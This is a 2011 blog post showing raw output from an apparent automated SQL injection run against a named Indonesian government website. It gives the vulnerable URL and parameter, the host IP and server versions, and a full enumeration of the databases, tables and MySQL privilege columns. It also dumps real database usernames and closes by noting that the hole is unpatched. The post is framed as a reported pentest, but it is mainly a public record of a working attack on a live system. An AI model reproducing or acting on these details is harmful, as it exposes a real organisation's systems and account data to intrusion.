Wednesday, 15 June 2011

SQL Injection Vulnerability on KPK.GO.ID

The following are the pentest results for http://www.kpk.go.id
Code:

Analyzing http://www.kpk.go.id/modules/glossaire/glossaire-p-f.php?op=ImprDef&id=132
Host IP: 119.235.24.34
Web Server: Apache/2.2.3 (Linux/SUSE)
Powered-by: PHP/5.2.6
Keyword Found: Kantor
Injection type is Integer
DB Server: MySQL >=5
Selected Column Count is 2
Finding string column
Valid String Column is 1
Target Vulnerable :D
Current DB: website2
Data Base Found: information_schema
Data Base Found: betterb
Data Base Found: dakwaan
Data Base Found: dakwaan1
Data Base Found: mysql
Data Base Found: survey
Data Base Found: test
Data Base Found: test1
Data Base Found: website
Data Base Found: website2
Count(table_name) of information_schema.tables Where table_schema=0x6D7973716C is 18

Tables found: columns_priv,db,func,help_category,help_keyword,help_relation,help_topic,host,proc,procs_priv,tables_priv,time_zone,time_zone_leap_second,time_zone_name,time_zone_transition,time_zone_transition_type,user,user_info
Count(column_name) of information_schema.columns Where table_schema=0x6D7973716C AND table_name=0x6462 is 20

Columns found: Host,Db,User,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Create_tmp_table_priv,Lock_tables_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Execute_priv
Count(column_name) of information_schema.columns Where table_schema=0x6D7973716C AND table_name=0x75736572 is 37
Columns found: Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections
Count(*) of mysql.db is 4
Data Found: User=4dm1n.1b4s
Data Found: User=betterb
Data Found: User=mobile
Data Found: User=webkpk2
Count(table_name) of information_schema.tables Where table_schema=0x77656273697465 is 93


Can not get all tables by group_concat!

Count(*) of mysql.db is 4
Data Found: Db=betterb
Data Found: Db=betterb
Data Found: Db=website2
Data Found: Db=website
Count(*) of mysql.user is 8



Vulnerability found by: TaBUn_GuCi
Pentest reported by Cyber4rt Crew to informasi@kpk.go.id on June 12, 2011, 02:46:18 PM
As of now it has still not been patched.
